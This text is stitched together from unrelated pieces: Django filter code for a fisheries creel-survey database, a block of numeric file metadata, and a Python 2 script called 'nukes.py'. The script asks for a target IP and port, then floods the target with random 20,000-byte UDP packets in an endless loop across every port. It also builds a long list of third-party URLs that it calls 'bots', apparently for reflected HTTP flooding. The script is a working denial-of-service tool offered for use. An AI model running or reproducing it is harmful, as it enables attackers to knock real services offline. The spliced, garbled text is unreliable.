field_name="fish__catch__interview__rods", lookup_expr="lt"
)
angmeth = ValueInFilter(field_name="fish__catch__interview__angmeth")
angmeth__not = ValueInFilter(
field_name="fish__catch__interview__angmeth", exclude=True
)
comment1__like = django_filters.CharFilter(
field_name="fish__catch__interview__comment1", lookup_expr="icontains"
)
# FN011 ATTRIBUTES
year = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="exact"
)
year__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="gte"
)
year__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="lte"
)
year__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="gt"
)
year__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="lt"
)
prj_date0 = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date0",
help_text="format: yyyy-mm-dd",
)
prj_date0__gte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date0",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
prj_date0__lte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date0",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
prj_date1 = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date1",
help_text="format: yyyy-mm-dd",
)
prj_date1__gte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date1",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
prj_date1__lte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date1",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
prj_cd = ValueInFilter(field_name="fish__catch__interview__sama__creel__prj_cd")
prj_cd__not = ValueInFilter(
field_name="fish__catch__interview__sama__creel__prj_cd", exclude=True
)
prj_cd__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_cd",
lookup_expr="icontains",
)
prj_cd__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_cd",
lookup_expr="icontains",
exclude=True,
)
prj_cd__endswith = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_cd", lookup_expr="endswith"
)
prj_cd__not_endswith = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_cd",
lookup_expr="endswith",
exclude=True,
)
prj_nm__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_nm",
lookup_expr="icontains",
)
prj_nm__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_nm",
lookup_expr="icontains",
exclude=True,
)
prj_ldr = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_ldr__username",
lookup_expr="iexact",
)
contmeth = ValueInFilter(field_name="fish__catch__interview__sama__creel__contmeth")
contmeth__not = ValueInFilter(
field_name="fish__catch__interview__sama__creel__contmeth", exclude=True
)
lake = ValueInFilter(field_name="fish__catch__interview__sama__creel__lake__abbrev")
lake__not = ValueInFilter(
field_name="fish__catch__interview__sama__creel__lake__abbrev", exclude=True
)
# SEASON FILTERS:
ssn = ValueInFilter(field_name="fish__catch__interview__sama__season__ssn")
ssn__not = ValueInFilter(
field_name="fish__catch__interview__sama__season__ssn", exclude=True
)
ssn__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__season__ssn", lookup_expr="icontains"
)
ssn__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__season__ssn",
lookup_expr="icontains",
exclude=True,
)
ssn_des = ValueInFilter(field_name="fish__catch__interview__sama__season__ssn_des")
ssn_des__not = ValueInFilter(
field_name="fish__catch__interview__sama__season__ssn_des", exclude=True
)
ssn_des__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__season__ssn_des",
lookup_expr="icontains",
)
ssn_des__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__season__ssn_des",
lookup_expr="icontains",
exclude=True,
)
ssn_date0 = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date0",
help_text="format: yyyy-mm-dd",
)
ssn_date0__gte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date0",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
ssn_date0__lte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date0",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
ssn_date1 = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date1",
help_text="format: yyyy-mm-dd",
)
ssn_date1__gte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date1",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
ssn_date1__lte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date1",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
# daytype filters
dtp = ValueInFilter(field_name="fish__catch__interview__sama__daytype__dtp")
dtp__not = ValueInFilter(
field_name="fish__catch__interview__sama__daytype__dtp", exclude=True
)
dtp_nm__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__daytype__dtp_nm",
lookup_expr="icontains",
)
dtp_nm__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__daytype__dtp_nm",
lookup_expr="icontains",
exclude=True,
)
# Period filters
prd = ValueInFilter(field_name="fish__catch__interview__sama__prd__prd")
prd__not = ValueInFilter(
field_name="fish__catch__interview__sama__prd__prd", exclude=True
)
prdtm0 = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm0",
help_text="format: HH:MM",
)
prdtm0__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm0",
lookup_expr="gte",
help_text="format: HH:MM",
)
prdtm0__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm0",
lookup_expr="lte",
help_text="format: HH:MM",
)
prdtm1 = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm1",
help_text="format: HH:MM",
)
prdtm1__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm1",
lookup_expr="gte",
help_text="format: HH:MM",
)
prdtm1__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm1",
lookup_expr="lte",
help_text="format: HH:MM",
)
prd_dur__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__prd__prd_dur", lookup_expr="gte"
)
prd_dur__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__prd__prd_dur", lookup_expr="lte"
)
# SPACE filters
space = ValueInFilter(field_name="fish__catch__interview__sama__area__space")
space__not = ValueInFilter(
field_name="fish__catch__interview__sama__area__space", exclude=True
)
space__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__area__space", lookup_expr="icontains"
)
space__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__area__space",
lookup_expr="icontains",
exclude=True,
)
space_des = ValueInFilter(
field_name="fish__catch__interview__sama__area__space_des"
)
space_des__not = ValueInFilter(
field_name="fish__catch__interview__sama__area__space_des", exclude=True
)
space_des__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__area__space_des",
lookup_expr="icontains",
)
space_des__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__area__space_des",
lookup_expr="icontains",
exclude=True,
)
# TO DO - add NULL NOT_NULL
space_siz__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__space_siz", lookup_expr="gte"
)
space_siz__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__space_siz", lookup_expr="lte"
)
space_siz__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__space_siz", lookup_expr="gt"
)
space_siz__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__space_siz", lookup_expr="lt"
)
# TO DO - add NULL NOT_NULL
area_cnt__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_cnt", lookup_expr="gte"
)
area_cnt__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_cnt", lookup_expr="lte"
)
area_cnt__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_cnt", lookup_expr="gt"
)
area_cnt__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_cnt", lookup_expr="lt"
)
# TO DO - add NULL NOT_NULL
area_wt__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_wt", lookup_expr="gte"
)
area_wt__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_wt", lookup_expr="lte"
)
area_wt__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_wt", lookup_expr="gt"
)
area_wt__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_wt", lookup_expr="lt"
)
# MODE
mode = ValueInFilter(field_name="fish__catch__interview__sama__mode__mode")
mode__not = ValueInFilter(
field_name="fish__catch__interview__sama__mode__mode", exclude=True
)
mode__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__mode__mode", lookup_expr="icontains"
)
mode__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__mode__mode",
lookup_expr="icontains",
exclude=True,
)
mode_des = ValueInFilter(field_name="fish__catch__interview__sama__mode__mode_des")
mode_des__not = ValueInFilter(
field_name="fish__catch__interview__sama__mode__mode_des", exclude=True
)
mode_des__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__mode__mode_des",
lookup_expr="icontains",
)
mode_des__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__mode__mode_des",
lookup_expr="icontains",
exclude=True,
)
| 36.114701
| 88
| 0.718676
| 2,692
| 22,355
| 5.21471
| 0.050149
| 0.110272
| 0.159282
| 0.176948
| 0.879755
| 0.85525
| 0.8212
| 0.762715
| 0.714347
| 0.603077
| 0
| 0.00508
| 0.18989
| 22,355
| 618
| 89
| 36.173139
| 0.770072
| 0.025274
| 0
| 0.253788
| 0
| 0
| 0.294732
| 0.214463
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003788
| 0
| 0.331439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2679f8274f3a9c8bceb9cbd63dd7737bc4d8a86c
| 200
|
py
|
Python
|
extensions/.stubs/clrclasses/System/Web/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | 1
|
2020-03-25T03:27:24.000Z
|
2020-03-25T03:27:24.000Z
|
extensions/.stubs/clrclasses/System/Web/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
extensions/.stubs/clrclasses/System/Web/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
from __clrclasses__.System.Web import AspNetHostingPermission
from __clrclasses__.System.Web import AspNetHostingPermissionAttribute
from __clrclasses__.System.Web import AspNetHostingPermissionLevel
| 50
| 70
| 0.91
| 18
| 200
| 9.444444
| 0.444444
| 0.247059
| 0.352941
| 0.405882
| 0.511765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06
| 200
| 3
| 71
| 66.666667
| 0.904255
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
26e85077319a4b6246649873d4f38ddd3f073801
| 93,454
|
py
|
Python
|
nukes.py
|
orbitcentre/NUKES
|
e982a39200dfbe7680ff626fc05f8577799470be
|
[
"MIT"
] | null | null | null |
nukes.py
|
orbitcentre/NUKES
|
e982a39200dfbe7680ff626fc05f8577799470be
|
[
"MIT"
] | null | null | null |
nukes.py
|
orbitcentre/NUKES
|
e982a39200dfbe7680ff626fc05f8577799470be
|
[
"MIT"
] | null | null | null |
import threading
import socket
import os
import sys
import random
import time
os.system("clear")
time.sleep(5)
print (" ________________________________________________")
print (" / \ ")
print (" | _________________________________________ |")
print (" | | | |")
print (" | | C:\> cd DOST | |")
print (" | | C:\> python2/3 nuke.py | |")
print (" | | C:\> author 666rabit | |")
print (" | | C:\> orbitcentre_ | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | |_________________________________________| |")
print (" | |")
print (" \_________________________________________________/")
print (" \___________________________________/")
print (" ___________________________________________")
print (" _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_")
print (" _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_")
print (" _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_")
print (" _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_")
print (" _-'.-.-.-.-.-. .---.-. .-------------------------. .-.---. .---.-.-.-.`-_")
print (":-------------------------------------------------------------------------:")
print ("`---._.-------------------------------------------------------------._.---'")
ip = raw_input("IP TARGET: ")
port = input("PORT: ")
fake_ip = "111.59.08.11"
os.system("clear")
###########
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(20000)
###########
print "[= ]"
time.sleep(2)
os.system("clear")
print "[== ]"
time.sleep(3)
os.system("clear")
print "[=== ]"
time.sleep(3)
os.system("clear")
print "[==== ]"
time.sleep(2)
os.system("clear")
print "[===== ]"
time.sleep(2)
os.system("clear")
print "[====== ]"
time.sleep(1)
os.system("clear")
print "[======= ]"
time.sleep(1)
os.system("clear")
print "[======== ]"
time.sleep(1)
os.system("clear")
print "[========= ]"
time.sleep(1)
os.system("clear")
print "[========== ]"
time.sleep(1)
os.system("clear")
print "[=========== ]"
time.sleep(1)
os.system("clear")
print "[============ ]"
time.sleep(1)
os.system("clear")
print "[============= ]"
time.sleep(1)
os.system("clear")
print "[============== ]"
time.sleep(1)
os.system("clear")
print "[=============== ]"
time.sleep(1)
os.system("clear")
print "[================ ]"
time.sleep(1)
os.system("clear")
print "[================= ]"
time.sleep(1)
os.system("clear")
print "[================== ]"
time.sleep(1)
os.system("clear")
print "[=================== ]"
time.sleep(1)
os.system("clear")
print "[====================]"
time.sleep(1)
os.system("clear")
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1
def bots():
global bots
bots=[]
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
